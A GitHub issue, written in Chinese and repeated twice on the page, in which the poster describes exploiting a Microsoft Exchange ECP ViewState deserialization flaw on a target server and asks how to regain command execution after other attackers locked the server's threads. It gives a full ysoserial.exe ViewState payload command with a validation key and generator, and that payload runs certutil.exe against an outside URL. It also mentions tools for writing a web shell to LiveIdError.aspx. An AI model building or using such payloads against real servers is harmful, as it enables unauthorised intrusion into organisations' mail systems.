We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
背景:因多个攻击者进行复现发起测试端口外连等操作导致线程锁死无法执行任何命令。 最初状态:可执行ping触发dnslog等命令。 现阶段:无法执行任何命令。 使用ExchangeDetect可以测试出存在漏洞。但是使用ExchangeCmd无法写入文件到LiveIdError.aspx。直接访问LiveIdError.aspx服务器会302跳转到 /ecp/error.aspx?aspxerrorpath=/ecp/LiveIdError.aspx 然后触发服务器500的错误。
之前是使用了certutil.exe 去测试端口连接性。使用的是手工的方式。去生成反序列化内容。 ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd /c certutil.exe http://bbbbbbbbbb" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="xxxx" --islegacy -isdebug
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd /c certutil.exe http://bbbbbbbbbb" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="xxxx" --islegacy -isdebug
目标环境证实可以执行命令。但现在无法执行有什么比较好的办法解决这个问题吗? 感谢
The text was updated successfully, but these errors were encountered:
No branches or pull requests
背景:因多个攻击者进行复现发起测试端口外连等操作导致线程锁死无法执行任何命令。
最初状态:可执行ping触发dnslog等命令。
现阶段:无法执行任何命令。
使用ExchangeDetect可以测试出存在漏洞。但是使用ExchangeCmd无法写入文件到LiveIdError.aspx。直接访问LiveIdError.aspx服务器会302跳转到 /ecp/error.aspx?aspxerrorpath=/ecp/LiveIdError.aspx 然后触发服务器500的错误。
之前是使用了certutil.exe 去测试端口连接性。使用的是手工的方式。去生成反序列化内容。
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd /c certutil.exe http://bbbbbbbbbb" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="xxxx" --islegacy -isdebug目标环境证实可以执行命令。但现在无法执行有什么比较好的办法解决这个问题吗? 感谢
The text was updated successfully, but these errors were encountered: